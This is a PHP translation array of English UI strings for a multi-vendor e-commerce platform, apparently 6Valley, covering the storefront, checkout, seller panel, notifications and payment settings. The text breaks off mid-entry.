'credential_updated' => 'Credential updated', 'online_shopping' => 'Online shopping', 'check_now' => 'Check now', 'all_Categories' => 'All Categories', 'most_visited_categories' => 'Most visited categories', 'See_all' => 'See all', 'in_stock' => 'In stock', 'recommended_for_you' => 'Recommended for you', 'latest_product' => 'Latest product', 'most_searching' => 'Most searching', 'don’t_miss_todays_deal' => 'Don’t miss todays deal', 'stock_available' => 'Stock available', 'shop_now' => 'Shop now', 'all_products' => 'All products', 'filter_by' => 'Filter by', 'a_to_z_order' => 'A to z order', 'z_to_a_Order' => 'Z to a Order', 'low_to_high_price' => 'Low to high price', 'high_to_low_price' => 'High to low price', 'price_range' => 'Price range', 'all_categories' => 'All categories', 'by_review_rating' => 'By review rating', 'best_selling' => 'Best selling', 'most_loved' => 'Most loved', 'signature_product' => 'Signature product', 'signature_product_for_this_season' => 'Signature product for this season', 'top_fashion_house' => 'Top fashion house', 'visit' => 'Visit', 'shop_again_from_your_recent_store' => 'Shop again from your recent store', 'visit_again' => 'Visit again', 'others_store' => 'Others store', 'top_rated_seller' => 'Top rated seller', 'new_seller' => 'New seller', 'visit_shop' => 'Visit shop', 'seller_reg' => 'Seller reg', 'sign_Out' => 'Sign Out', 'ex_:_8+_character' => 'Ex : 8+ character', 'enjoy_new_experience' => 'Enjoy new experience', 'ex:' => 'Ex:', 'by_clicking_sign_up_you_are_agreed_with_our ' => 'By clicking sign up you are agreed with our ', 'terms_&_policy' => 'Terms & policy', 'have_an_account' => 'Have an account', 'Customers will not be able to select COD as a payment method during checkout. Please review your settings and enable COD if you wish to offer this payment option to customers.' => 'Customers will not be able to select COD as a payment method during checkout. Please review your settings and enable COD if you wish to offer this payment option to customers.', 'compare' => 'Compare', 'newsletter' => 'Newsletter', 'be_the_first_one_to_know_about_discounts_offers_and_events' => 'Be the first one to know about discounts offers and events', 'enter_your_email' => 'Enter your email', 'popular_tags' => 'Popular tags', 'quick_links' => 'Quick links', 'upcoming_campaign' => 'Upcoming campaign', 'all_stores' => 'All stores', 'blog' => 'Blog', 'support' => 'Support', 'live_chat' => 'Live chat', 'manage_deliveries' => 'Manage deliveries', 'payment_option' => 'Payment option', 'accept_All_Cookies' => 'Accept All Cookies', 'promo_banner_left' => 'Promo banner left', 'promo_banner_middle_top' => 'Promo banner middle top', 'promo_banner_middle_bottom' => 'Promo banner middle bottom', 'promo_banner_right' => 'Promo banner right', 'promo_banner_bottom' => 'Promo banner bottom', 'shop_wise_with' => 'Shop wise with', 'explore_now' => 'Explore now', 'search_products' => 'Search products', 'similar_category_product' => 'Similar category product', 'z_to_a_order' => 'Z to a order', 'all_Pages_Banner' => 'All Pages Banner', 'share' => 'Share', 'category_tag' => 'Category tag', 'social_Media_Chatting' => 'Social Media Chatting', 'whatsApp' => 'WhatsApp', 'whatsapp_information_update_successfully' => 'Whatsapp information update successfully', 'refer_&_earn' => 'Refer & earn', 'refer_&_Earn' => 'Refer & Earn', 'joined' => 'Joined', 'in_compare' => 'In compare', 'my_wishlist' => 'My wishlist', 'my_compare_list' => 'My compare list', 'inbox' => 'Inbox', 'invite_Your_Friends_&_Businesses' => 'Invite Your Friends & Businesses', 'copy_your_code_and_share_your_friends' => 'Copy your code and share your friends', 'your_personal_code' => 'Your personal code', 'oR_SHARE' => 'OR SHARE', 'how_you_it_works' => 'How you it works', 'invite_your_friends_&_businesses' => 'Invite your friends & businesses', 'they_register_6Valley_with_special_offer' => 'They register 6Valley with special offer', 'you_made_your_earning' => 'You made your earning', 'successfully_copied' => 'Successfully copied', 'copied_failed' => 'Copied failed', 'instagram' => 'Instagram', 'linkedIn' => 'LinkedIn', 'pinterest' => 'Pinterest', 'google_plus' => 'Google plus', 'enter_Social_Media_Link' => 'Enter Social Media Link', 'social_Name_Is_Requeired.' => 'Social Name Is Requeired.', 'social_Link_Is_Requeired.' => 'Social Link Is Requeired.', 'social_Media_Already_taken' => 'Social Media Already taken', 'social_Media_inserted_Successfully.' => 'Social Media inserted Successfully.', 'social_info_updated_successfully.' => 'Social info updated successfully.', 'are_you_sure_delete_this_social_media' => 'Are you sure delete this social media', 'social_media_deleted_successfully.' => 'Social media deleted successfully.', 'my_wishlists' => 'My wishlists', 'search_by_name_or_category' => 'Search by name or category', 'all_wishing_product_list' => 'All wishing product list', 'remove_all' => 'Remove all', 'stock_status' => 'Stock status', 'vat' => 'Vat', 'no_discount' => 'No discount', 'stock_Available' => 'Stock Available', 'stock_not_available' => 'Stock not available', 'product_comparison' => 'Product comparison', 'find_and_select_products_to_see_the_differences_and_similarities_between_them' => 'Find and select products to see the differences and similarities between them', 'color_variant' => 'Color variant', 'no_rating' => 'No rating', 'no_color' => 'No color', 'view_all_cart_items' => 'View all cart items', ' ecommerce' => ' ecommerce', 'all_cart_product_list' => 'All cart product list', 'totals_cost' => 'Totals cost', 'apply_coupon_code' => 'Apply coupon code', 'item_price' => 'Item price', 'proceed_to_checkout' => 'Proceed to checkout', 'item_has_been_removed_from_cart ' => 'Item has been removed from cart ', 'Secret Covered in Sand Comic book pdf' => 'Secret Covered in Sand Comic book pdf', 'total_price_for_this_product' => 'Total price for this product', 'you_can_check_our' => 'You can check our', 'ask_about_this_product' => 'Ask about this product', 'recommended' => 'Recommended', 'positive' => 'Positive', 'good' => 'Good', 'neutral' => 'Neutral', 'negative' => 'Negative', 'general_info' => 'General info', 'view_less' => 'View less', 'top_rated_product_from_this_store' => 'Top rated product from this store', 'contact_with_seller' => 'Contact with seller', 'type _your_message' => 'Type your message', 'go_to_chatbox' => 'Go to chatbox', 'similar_product_from_this_store' => 'Similar product from this store', 'you_may_also_like' => 'You may also like', 'start_from' => 'Start from', 'shipping_details' => 'Shipping details', 'delivery_information_details' => 'Delivery information details', 'delivery_address' => 'Delivery address', 'select_from_saved' => 'Select from saved', 'set_from_map' => 'Set from map', 'set_delivery_address' => 'Set delivery address', 'select_country' => 'Select country', 'zip_Code' => 'Zip Code', 'others' => 'Others', 'contact_Person_Name' => 'Contact Person Name', 'save_this_Address' => 'Save this Address', 'order_summary' => 'Order summary', 'proceed_to_next' => 'Proceed to next', 'saved_addresses' => 'Saved addresses', 'update_this_Address' => 'Update this Address', 'personal_details' => 'Personal details', 'edit_profile' => 'Edit profile', 'my_address' => 'My address', 'add_address' => 'Add address', 'this_coupon_is_valid_for_use_after_a_minimum_purchase_of' => 'This coupon is valid for use after a minimum purchase of', 'select_payment_method' => 'Select payment method', 'please_confirm_your_verified_account_to_pay_through_your_bank_account' => 'Please confirm your verified account to pay through your bank account', 'error' => 'Error', 'your_order_is_completed' => 'Your order is completed', 'your_order_is_being_processed_and_will_be_completed_within_3-6 hours._you_will_receive_an_email_confirmation_when_your_order_is_completed.' => 'Your order is being processed and will be completed within 3-6 hours. you will receive an email confirmation when your order is completed.', 'previous' => 'Previous', 'search_by_order_ID' => 'Search by order ID', 'order_invoice' => 'Order invoice', 'all_copy_right_reserved_©_2023_' => 'All copy right reserved © 2023 ', 'my_order_details' => 'My order details', 'delivery_man_info' => 'Delivery man info', 'shipping_fee' => 'Shipping fee', 'store_list' => 'Store list', 'search_store' => 'Search store', 'shop_page' => 'Shop page', 'followers' => 'Followers', 'want_to_unfollow_this_shop' => 'Want to unfollow this shop', 'featured_product_from_this_store' => 'Featured product from this store', 'all_product' => 'All product', 'this_shop_is_temporary_closed_or_on_vacation' => 'This shop is temporary closed or on vacation', 'you_cannot_add_product_to_cart_from_this_shop_for_now' => 'You cannot add product to cart from this shop for now', '15 IN 1 MAKEUP COMBO SET WITH FULL MAKEUP COVERAGE set' => '15 IN 1 MAKEUP COMBO SET WITH FULL MAKEUP COVERAGE set', 'Chicken and Egg Puppy Dog Food 400g' => 'Chicken and Egg Puppy Dog Food 400g', 'Ava Professional Hair Straightener - Black color' => 'Ava Professional Hair Straightener - Black color', 'Silicone Strap Analogue Sports Watch Rectangular Dial New Model 2023 Men Watches' => 'Silicone Strap Analogue Sports Watch Rectangular Dial New Model 2023 Men Watches', 'online_Shopping' => 'Online Shopping', 'see_the_latest_deals_and_exciting_new_offers' => 'See the latest deals and exciting new offers', 'fast_delivery_all_accross_the_country' => 'Fast delivery all accross the country', 'safe_payment' => 'Safe payment', '7_Days_Return_Policy' => '7 Days Return Policy', 'expand_Menu' => 'Expand Menu', 'seller_zone' => 'Seller zone', 'become_a_seller' => 'Become a seller', 'about_Company' => 'About Company', 'contact_Us' => 'Contact Us', 'subscribe_to_our_new_channel_to_get_latest_updates' => 'Subscribe to our new channel to get latest updates', 'your_Email_Address' => 'Your Email Address', 'start_a_conversation' => 'Start a conversation', 'currency_changed_to' => 'Currency changed to', 'item_has_been_removed_from_cart' => 'Item has been removed from cart', 'sorry_the_minimum_order_quantity_does_not_match' => 'Sorry the minimum order quantity does not match', 'sorry_stock_limit_exceeded.' => 'Sorry stock limit exceeded.', 'enter_email_address_or_phone_number' => 'Enter email address or phone number', 'show_password' => 'Show password', 'image_ratio_should_be' => 'Image ratio should be', 'country_code_is_must_like_for_BD' => 'Country code is must like for BD', 'want_to_delete_this_account' => 'Want to delete this account', 'please_ReType_Password' => 'Please ReType Password', 'passwords_do_not_match' => 'Passwords do not match', 'passwords_match' => 'Passwords match', 'subject' => 'Subject', 'website_problem' => 'Website problem', 'complaint' => 'Complaint', 'info_inquiry' => 'Info inquiry', 'urgent' => 'Urgent', 'high' => 'High', 'medium' => 'Medium', 'topic' => 'Topic', 'customer_referrer_earning' => 'Customer referrer earning', 'One Referrer Equal To How Much USD' => 'One Referrer Equal To How Much USD', 'customer_settings_updated_successfully' => 'Customer settings updated successfully', 'Website problem' => 'Website problem', 'do_you_want_to_delete_this' => 'Do you want to delete this', 'Do_not_delete' => 'Do not delete', 'search_Ticket_by_Subject_or_status' => 'Search Ticket by Subject or status', 'all_Priority' => 'All Priority', 'all_Status' => 'All Status', 'leave_a_Message' => 'Leave a Message', 'write_your_message_here' => 'Write your message here', 'please write the message' => 'Please write the message', 'reply' => 'Reply', 'support_Ticket_Answer' => 'Support Ticket Answer', 'date_Submitted' => 'Date Submitted', 'last_updated' => 'Last updated', 'please_write_the_message' => 'Please write the message', 'submit_message' => 'Submit message', 'forgot_Password' => 'Forgot Password', 'forgot_your_password' => 'Forgot your password', 'change_your_password_in_three_easy_steps.' => 'Change your password in three easy steps.', 'this_helps_to_keep_your_new_password_secure.' => 'This helps to keep your new password secure.', 'fill_in_your_email_address_below.' => 'Fill in your email address below.', 'we_will_email_you_a_temporary_code.' => 'We will email you a temporary code.', 'use_the_code_to_change_your_password_on_our_secure_website.' => 'Use the code to change your password on our secure website.', 'enter_your_email_address' => 'Enter your email address', 'please_provide_valid_email_address.' => 'Please provide valid email address.', 'get_new_password' => 'Get new password', 'Password_Reset_Mail' => 'Password Reset Mail', 'Configuration_updated_successfully' => 'Configuration updated successfully', 'Test_Email_Sender' => 'Test Email Sender', 'mail_received_successfully' => 'Mail received successfully', 'valid_till' => 'Valid till', 'available_from_minimum_purchase' => 'Available from minimum purchase', 'copied' => 'Copied', 'Coupon_status_updated' => 'Coupon status updated', 'shop_Page' => 'Shop Page', 'search_products_from_this_store' => 'Search products from this store', 'All_Seller_Page' => 'All Seller Page', 'all_Sellers' => 'All Sellers', 'max' => 'Max', 'items_found' => 'Items found', 'low_to_High_Price' => 'Low to High Price', 'excellent' => 'Excellent', 'average' => 'Average', 'below_Average' => 'Below Average', 'poor' => 'Poor', 'product_review' => 'Product review', 'safe_Payment' => 'Safe Payment', 'visit_Store' => 'Visit Store', 'more_From_The_Store' => 'More From The Store', 'all_Category' => 'All Category', 'select_your_desire_category.' => 'Select your desire category.', 'chat_with_delivery_man' => 'Chat with delivery man', 'my_Order_List' => 'My Order List', 'chat_with_deliveryman' => 'Chat with deliveryman', 'shipping_Fee' => 'Shipping Fee', 'track_Order' => 'Track Order', 'send_a_message' => 'Send a message', 'product_List' => 'Product List', 'in_House_Product_List' => 'In House Product List', 'search_Product_Name' => 'Search Product Name', 'limited_Sotcks' => 'Limited Sotcks', 'add_New_Product' => 'Add New Product', 'product Name' => 'Product Name', 'product Type' => 'Product Type', 'show_as_featured' => 'Show as featured', 'Status_updated_failed.' => 'Status updated failed.', 'Product_must_be_approved' => 'Product must be approved', 'featured_status_updated_successfully' => 'Featured status updated successfully', 'product_Add' => 'Product Add', 'general_Info' => 'General Info', 'ready_After_Sell' => 'Ready After Sell', 'ready_Product' => 'Ready Product', 'sub_Category' => 'Sub Category', 'sub_Sub_Category' => 'Sub Sub Category', 'unit' => 'Unit', 'colors' => 'Colors', 'product_price_&_stock' => 'Product price & stock', 'tax_Model' => 'Tax Model', 'discount_Type' => 'Discount Type', 'flat' => 'Flat', 'total_Quantity' => 'Total Quantity', 'meta_Title' => 'Meta Title', 'meta_Description' => 'Meta Description', 'meta_Image' => 'Meta Image', 'youtube_video_link' => 'Youtube video link', 'optional_please_provide_embed_link_not_direct_link' => 'Optional please provide embed link not direct link', 'upload_product_images' => 'Upload product images', 'upload_thumbnail' => 'Upload thumbnail', 'please_only_input_png_or_jpg_type_file' => 'Please only input png or jpg type file', 'choice_Title' => 'Choice Title', 'enter_choice_values' => 'Enter choice values', 'want_to_add_this_product' => 'Want to add this product', 'product_added_successfully' => 'Product added successfully', 'variant Price' => 'Variant Price', 'refer_code' => 'Refer code', 'Already_have_store' => 'Already have store', 'NB' => 'NB', 'image_size_must_be_within' => 'Image size must be within', 'image_type_must_be_within' => 'Image type must be within', 'Ex_:_Shop_-12_Road-8' => 'Ex : Shop -12 Road-8', 'overall_Statistics' => 'Overall Statistics', 'out_For_Delivery' => 'Out For Delivery', 'seller_Wallet' => 'Seller Wallet', 'withdrawable_balance' => 'Withdrawable balance', 'pending_Withdraw' => 'Pending Withdraw', 'total_Commission_given' => 'Total Commission given', 'already_Withdrawn' => 'Already Withdrawn', 'withdraw_Request' => 'Withdraw Request', 'incomplete_bank_info' => 'Incomplete bank info', 'update_your_bank_info_first' => 'Update your bank info first', 'failed To Deliver' => 'Failed To Deliver', 'refund_Request_List' => 'Refund Request List', 'product_Reviews' => 'Product Reviews', 'delivery-Man' => 'Delivery-Man', 'Reports_&_Analysis' => 'Reports & Analysis', 'emergency_Contact' => 'Emergency Contact', 'copyright' => 'Copyright', 'select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'Select Logout below if you are ready to end your current session', 'you_have_new order' => 'You have new order', 'check_Please' => 'Check Please', 'shop_view' => 'Shop view', 'shop_Info' => 'Shop Info', 'by_turning_on_temporary_close_mode _your_shop_will_be_shown_as_temporary_off_in_the_website_and_app_for_the_customers._they_cannot_purchase_or_place_order_from_your_shop' => 'By turning on temporary close mode your shop will be shown as temporary off in the website and app for the customers. they cannot purchase or place order from your shop', 'my_shop_info' => 'My shop info', 'vacation_Mode' => 'Vacation Mode', 'vacation_Start' => 'Vacation Start', 'vacation_End' => 'Vacation End', 'vacation_Note' => 'Vacation Note', 'are_you_sure_Change_this' => 'Are you sure Change this', 'Ex:_6+ character' => 'Ex: 6+ character', 'Image_ratio_should_be' => 'Image ratio should be', 'seller_Image' => 'Seller Image', 'upload_image' => 'Upload image', '8+_Character' => '8+ Character', 'repeat' => 'Repeat', 'not_match' => 'Not match', 'upload_logo' => 'Upload logo', 'upload_Banner' => 'Upload Banner', 'customer_list' => 'Customer list', 'search_by_Name_or_Email_or_Phone' => 'Search by Name or Email or Phone', 'total_Order' => 'Total Order', 'sorry_this_item_is_currently_sold_out' => 'Sorry this item is currently sold out', 'order_place' => 'Order place', 'add_fund_by_admin' => 'Add fund by admin', 'how_to_use' => 'How to use', 'seller_Info' => 'Seller Info', 'repeat_password_not_match' => 'Repeat password not match', 'apply_Shop' => 'Apply Shop', 'create_support_tickets' => 'Create support tickets', 'Website_problem' => 'Website problem', 'Info_inquiry' => 'Info inquiry', 'flash_Deal' => 'Flash Deal', 'add_Product' => 'Add Product', 'deal_Product' => 'Deal Product', 'add_new_product' => 'Add new product', 'product_Table' => 'Product Table', 'are_you_sure_remove_this_product' => 'Are you sure remove this product', 'language_Translate' => 'Language Translate', 'key_removed_successfully' => 'Key removed successfully', 'key_translated_successfully' => 'Key translated successfully', 'Waltro Vivobook X515ea intel core i3 1115g4 4GB DDR4 Ram 512GB' => 'Waltro Vivobook X515ea intel core i3 1115g4 4GB DDR4 Ram 512GB', 'ex_:_7+_character' => 'Ex : 7+ character', 'no_Account' => 'No Account', 'register_control_your_order.' => 'Register control your order.', 'please_enter_your_first_name' => 'Please enter your first name', 'please_enter_your_last_name' => 'Please enter your last name', 'please_enter_valid_email_address' => 'Please enter valid email address', 'please_enter_your_phone_number' => 'Please enter your phone number', 'seller_apply' => 'Seller apply', 'seller_registration' => 'Seller registration', 'create_your_own_store.' => 'Create your own store.', 'already_have_store ' => 'Already have store ', 'open_your_and_start_selling.' => 'Open your and start selling.', 'create_your_own_business' => 'Create your own business', 'enter_email' => 'Enter email', 'enter_password' => 'Enter password', 'password_doesn t_match' => 'Password doesn t match', 'seller_image' => 'Seller image', 'image_ration' => 'Image ration', 'store_name' => 'Store name', 'store_address' => 'Store address', 'store_banner' => 'Store banner', 'image_ratio' => 'Image ratio', 'store_logo' => 'Store logo', 'your_password_must_be_at_least_8_characters' => 'Your password must be at least 8 characters', 'password_doesn t_Match' => 'Password doesn t Match', 'customer_verify' => 'Customer verify', ' please_Verify_that_it’s_you.' => ' please Verify that it’s you.', 'an_OTP' => 'An OTP', 'one_time_password' => 'One time password', 'has_been_sent_to_' => 'Has been sent to ', 'resend_code_within' => 'Resend code within', 'resend_OTP' => 'Resend OTP', 'verification_successfully_completed' => 'Verification successfully completed', 'thank_you_for_your_verification' => 'Thank you for your verification', 'now_you_can_login' => 'Now you can login', 'please_Verify_that_it’s_you.' => 'Please Verify that it’s you.', 'by_clicking_sign_up_you_are_agreed_with_our' => 'By clicking sign up you are agreed with our', 'Main_Banner' => 'Main Banner', 'Footer_Banner' => 'Footer Banner', 'Popup_Banner' => 'Popup Banner', 'enter_url' => 'Enter url', 'banner_updated_successfully' => 'Banner updated successfully', 'please_verify_that_it’s_you.' => 'Please verify that it’s you.', 'View_all_cart_items' => 'View all cart items', 'product_Edit' => 'Product Edit', 'new_Product' => 'New Product', 'purchese_price' => 'Purchese price', 'clear_all' => 'Clear all', 'FCM_Settings' => 'FCM Settings', 'push_Notification_Setup' => 'Push Notification Setup', 'Firebase Configuration' => 'Firebase Configuration', 'where_to_get_this_information ' => 'Where to get this information ', 'server_Key' => 'Server Key', 'Ex: abcd1234efgh5678ijklmnop90qrstuvwxYZ' => 'Ex: abcd1234efgh5678ijklmnop90qrstuvwxYZ', 'FCM_Project_ID' => 'FCM Project ID', 'api_Key' => 'Api Key', 'Ex: my-awesome-app-12345' => 'Ex: my-awesome-app-12345', 'auth_domain' => 'Auth domain', 'Ex: my-awesome-app.firebaseapp.com' => 'Ex: my-awesome-app.firebaseapp.com', 'storage_bucket' => 'Storage bucket', 'Ex: my-awesome-app.appspot.com' => 'Ex: my-awesome-app.appspot.com', 'messaging_sender_id' => 'Messaging sender id', 'Ex: 1234567890' => 'Ex: 1234567890', 'api_ID' => 'Api ID', 'Ex: 9876543210' => 'Ex: 9876543210', 'measurement_ID' => 'Measurement ID', 'Ex: F-12345678' => 'Ex: F-12345678', 'notificatios' => 'Notificatios', 'send_notification' => 'Send notification', 'Send_Notification' => 'Send Notification', 'wallet_bonus_setup' => 'Wallet bonus setup', 'email_templates' => 'Email templates', 'read_documentation' => 'Read documentation', 'order_Pending_Message' => 'Order Pending Message', 'order_Confirmation_Message' => 'Order Confirmation Message', 'order_Packaging_Message' => 'Order Packaging Message', 'order_out_for_delivery_Message' => 'Order out for delivery Message', 'order_Delivered_Message' => 'Order Delivered Message', 'order_Returned_Message' => 'Order Returned Message', 'order_Failed_Message' => 'Order Failed Message', 'order_canceled_message' => 'Order canceled message', 'order_refunded_message' => 'Order refunded message', 'refund_request_canceled_message' => 'Refund request canceled message', 'message_from_delivery_man' => 'Message from delivery man', 'message_from_seller' => 'Message from seller', 'fund_add_by_admin+message' => 'Fund add by admin+message', 'got_it' => 'Got it', 'ex: 49679646444789dsf64f64f6' => 'Ex: 49679646444789dsf64f64f6', 'ex: dhaka' => 'Ex: dhaka', 'ex: f64f6' => 'Ex: f64f6', 'PAYMENT_METHODS' => 'PAYMENT METHODS', 'Ofline_Payment_Methods' => 'Ofline Payment Methods', 'offline_Payment_Methods' => 'Offline Payment Methods', 'offline_Payment_Method' => 'Offline Payment Method', 'order_Type' => 'Order Type', 'custom' => 'Custom', 'category_Name' => 'Category Name', 'new_Category' => 'New Category', 'set_Priority' => 'Set Priority', 'category_Logo' => 'Category Logo', 'category_Image' => 'Category Image', 'category_deleted_successfully.' => 'Category deleted successfully.', 'search_by_name' => 'Search by name', 'brand_Logo' => 'Brand Logo', 'total_Product' => 'Total Product', 'are_you_sure_delete_this_brand' => 'Are you sure delete this brand', 'brand_deleted_successfully' => 'Brand deleted successfully', 'add_new_notification' => 'Add new notification', 'new_notification' => 'New notification', 'send_Notification' => 'Send Notification', 'push_notification_table' => 'Push notification table', 'search_by_title' => 'Search by title', 'notification_count' => 'Notification count', 'resend' => 'Resend', 'you_will_not_be able_to_revert_this' => 'You will not be able to revert this', 'notification_deleted_successfully' => 'Notification deleted successfully', 'resend_notification' => 'Resend notification', 'earning_Reports' => 'Earning Reports', 'admin_Earning' => 'Admin Earning', 'seller_Earning' => 'Seller Earning', 'filter_Data' => 'Filter Data', 'custom_Date' => 'Custom Date', 'total_earnings' => 'Total earnings', 'total_In_House_Products' => 'Total In House Products', 'total_Shop' => 'Total Shop', 'earning_Statistics' => 'Earning Statistics', 'total_Earnings' => 'Total Earnings', 'payment_Statistics' => 'Payment Statistics', 'payments_Amount' => 'Payments Amount', 'in-House_Earning' => 'In-House Earning', 'commission_Earning' => 'Commission Earning', 'earn_From_Shipping' => 'Earn From Shipping', 'discount_Given' => 'Discount Given', 'refund_Given' => 'Refund Given', 'total_Earning' => 'Total Earning', 'cash_Payments' => 'Cash Payments', 'digital_Payments' => 'Digital Payments', 'wallet_Payments' => 'Wallet Payments', 'search_by_Name_or_Phone_or_Email' => 'Search by Name or Phone or Email', 'deliveryman_List' => 'Deliveryman List', 'add_Delivery_Man' => 'Add Delivery Man', 'contact info' => 'Contact info', 'total_Orders' => 'Total Orders', 'Ex: English' => 'Ex: English', 'currency' => 'Currency', 'phone (OTP)' => 'Phone (OTP)', 'email_Verification' => 'Email Verification', 'guest_checkout' => 'Guest checkout', 'app_download_info' => 'App download info', 'download_link' => 'Download link', 'app_store_download_link' => 'App store download link', 'Ex: https://www.apple.com/app-store/' => 'Ex: https://www.apple.com/app-store/', 'play_store_download_link' => 'Play store download link', 'Ex: https://play.google.com/store/apps' => 'Ex: https://play.google.com/store/apps', 'save_information' => 'Save information', 'by_turning_on_temporary_close_mode _your_shop_will_be_shown_as_temporary_off_in_the_website_and_app_for_the_customers.' => 'By turning on temporary close mode your shop will be shown as temporary off in the website and app for the customers.', 'they_cannot_purchase_or_place_order_from_your_shop' => 'They cannot purchase or place order from your shop', 'print__Invoice' => 'Print Invoice', 'item_Details' => 'Item Details', 'change_status_to_paid' => 'Change status to paid', 'location_data' => 'Location data', 'you_wont_be_able_to_revert_this' => 'You wont be able to revert this', 'delivery_man_successfully_assigned/changed' => 'Delivery man successfully assigned/changed', 'deliveryman_man_can_not_assign/change_in_that_status' => 'Deliveryman man can not assign/change in that status', 'edit_products' => 'Edit products', 'change_order_status' => 'Change order status', 'Ex: John Doe' => 'Ex: John Doe', 'Ex: 32416436546' => 'Ex: 32416436546', 'Ex: Dhaka' => 'Ex: Dhaka', 'Ex: 1216' => 'Ex: 1216', 'Ex: Street 1 Street 2 Street 3 Street 4' => 'Ex: Street 1 Street 2 Street 3 Street 4', 'Ex: john@gmail.com' => 'Ex: john@gmail.com', 'update_product_list' => 'Update product list', 'consumer_electronics' => 'Consumer electronics', 'wearable' => 'Wearable', 'audio' => 'Audio', 'select_subcategory' => 'Select subcategory', 'electronics' => 'Electronics', 'select_brand' => 'Select brand', 'gogoi' => 'Gogoi', 'puma' => 'Puma', 'warely' => 'Warely', 'Search by product name or bar code' => 'Search by product name or bar code', 'select_variation' => 'Select variation', 'sound' => 'Sound', 'update_cart' => 'Update cart', 'product_Section' => 'Product Section', 'billing_Section' => 'Billing Section', 'view_all_hold_orders' => 'View all hold orders', 'wc-327478' => 'Wc-327478', 'product_Discount' => 'Product Discount', 'extra_Discount' => 'Extra Discount', 'coupon_Discount' => 'Coupon Discount', 'paid_By' => 'Paid By', 'cancel_Order' => 'Cancel Order', 'list_of_hold_orders' => 'List of hold orders', 'resume' => 'Resume', 'cancel_order' => 'Cancel order', 'amount_can_not_be_negative_or_zero' => 'Amount can not be negative or zero', 'product_already_added_in_cart' => 'Product already added in cart', 'sorry_product_is_out_of_stock.' => 'Sorry product is out of stock.', 'item_has_been_added_in_your_cart' => 'Item has been added in your cart', 'you_want_to_remove_all_items_from_cart' => 'You want to remove all items from cart', 'product_quantity_is_not_enough' => 'Product quantity is not enough', 'product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'Product quantity can not be zero or less than zero in cart', 'product_quantity_updated' => 'Product quantity updated', 'sorry_product_out_of_stock' => 'Sorry product out of stock', 'Product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'Product quantity can not be zero or less than zero in cart', 'Product_quantity_updated' => 'Product quantity updated', 'wc-327479' => 'Wc-327479', 'wc-327477' => 'Wc-327477', '10% OFF' => '10% OFF', 'total_Price' => 'Total Price', 'search_by_Product_Name' => 'Search by Product Name', 'limited_Stocks' => 'Limited Stocks', 'product_Name' => 'Product Name', 'product_Type' => 'Product Type', 'active_Status' => 'Active Status', 'product_must_be_approved' => 'Product must be approved', 'Ready_After_Sell' => 'Ready After Sell', 'Ready_Product' => 'Ready Product', 'generate_Code' => 'Generate Code', 'meta_title' => 'Meta title', 'meta_image' => 'Meta image', 'meta_description' => 'Meta description', 'please_provide_embed_link_not_direct_link' => 'Please provide embed link not direct link', 'product_updated_successfully' => 'Product updated successfully', 'add_Shipping' => 'Add Shipping', 'order_wise_shipping_method_status_updated_successfully' => 'Order wise shipping method status updated successfully', 'shipping_Method_deleted_successfully' => 'Shipping Method deleted successfully', 'total_Order_Amount' => 'Total Order Amount', 'due_Amount' => 'Due Amount', 'already_Settled' => 'Already Settled', 'order_Statistics' => 'Order Statistics', 'shipping_Charge' => 'Shipping Charge', 'cash_Payment' => 'Cash Payment', 'chatting_Page' => 'Chatting Page', 'chatting_List' => 'Chatting List', 'search_customers' => 'Search customers', 'send_Reply' => 'Send Reply', 'no_message_available' => 'No message available', 'some_status_buttons_are_disabled_because_the_admin_added_coupons' => 'Some status buttons are disabled because the admin added coupons', 'the_coupon_discount_bearer_is_admin' => 'The coupon discount bearer is admin', 'or_some_coupons_are_for_all_sellers' => 'Or some coupons are for all sellers', 'some_actions_are_disabled_because_the_admin_added_coupons' => 'Some actions are disabled because the admin added coupons', 'seller_Product_List' => 'Seller Product List', 'no_data_to_show' => 'No data to show', 'product_Preview' => 'Product Preview', 'view_live' => 'View live', 'total_sold' => 'Total sold', 'general_information' => 'General information', 'subcategory' => 'Subcategory', 'current_stock' => 'Current stock', 'price_information' => 'Price information', 'available_variations' => 'Available variations', 'reviewer' => 'Reviewer', 'product_Image' => 'Product Image', 'save_changes' => 'Save changes', 'general_setup' => 'General setup', 'upload_file' => 'Upload file', 'product_sku' => 'Product sku', 'delivery_type' => 'Delivery type', 'product_variation_setup' => 'Product variation setup', 'select_colors' => 'Select colors', 'select_attributes' => 'Select attributes', 'Pricing_&_others' => 'Pricing & others', 'purchase_price ($)' => 'Purchase price ($)', 'unit_price_($)' => 'Unit price ($)', 'minimum_order_qty' => 'Minimum order qty', 'current_stock_qty' => 'Current stock qty', 'discount_amount' => 'Discount amount', 'ex: 5' => 'Ex: 5', 'tax_amount' => 'Tax amount', 'tax_calculation' => 'Tax calculation', 'include_with_product' => 'Include with product', 'exclude_with_product' => 'Exclude with product', 'product_thumbnail' => 'Product thumbnail', 'colour_wise_product_image' => 'Colour wise product image', 'upload_additional_image' => 'Upload additional image', 'product_video' => 'Product video', 'product_Edit dsf' => 'Product Edit dsf', 'variant_Price' => 'Variant Price', 'request' => 'Request', 'payment_Method_Name' => 'Payment Method Name', 'payment_Info' => 'Payment Info', 'required_Info_From_Customer' => 'Required Info From Customer', 'offline_payment_method_added_successfully' => 'Offline payment method added successfully', 'input_field_Name' => 'Input field Name', 'bank_Name' => 'Bank Name', 'input_Data' => 'Input Data', 'AVC' => 'AVC', 'bank' => 'Bank', 'offline_payment_method_delete_successfully' => 'Offline payment method delete successfully', 'add_Fields' => 'Add Fields', 'input_Field_Type' => 'Input Field Type', 'string' => 'String', 'this_field_required' => 'This field required', 'reached_maximum' => 'Reached maximum', 'payment_By' => 'Payment By', 'place_Holder' => 'Place Holder', 'enter_name' => 'Enter name', 'is_Required' => 'Is Required', 'order_Verification' => 'Order Verification', 'set_minimum_order_amount' => 'Set minimum order amount', 'minimum_order_amount' => 'Minimum order amount', '($)' => '($)', 'refund_order_validity' => 'Refund order validity', '(days)' => '(days)', '07' => '07', 'add_method' => 'Add method', 'search_Method_Name' => 'Search Method Name', 'placeholder' => 'Placeholder', 'default_Method_updated_successfully' => 'Default Method updated successfully', 'default_Method_updated_failed' => 'Default Method updated failed', 'status_update_failed' => 'Status update failed', 'offline_payment_method_not_found' => 'Offline payment method not found', 'add_Offline_Payment_Method' => 'Add Offline Payment Method', 'edit_Offline_Payment_Method' => 'Edit Offline Payment Method', 'offline_payment_method_update_successfully' => 'Offline payment method update successfully', 'payment_Information' => 'Payment Information', 'Add_New_Field' => 'Add New Field', 'required_Information_from_Customer' => 'Required Information from 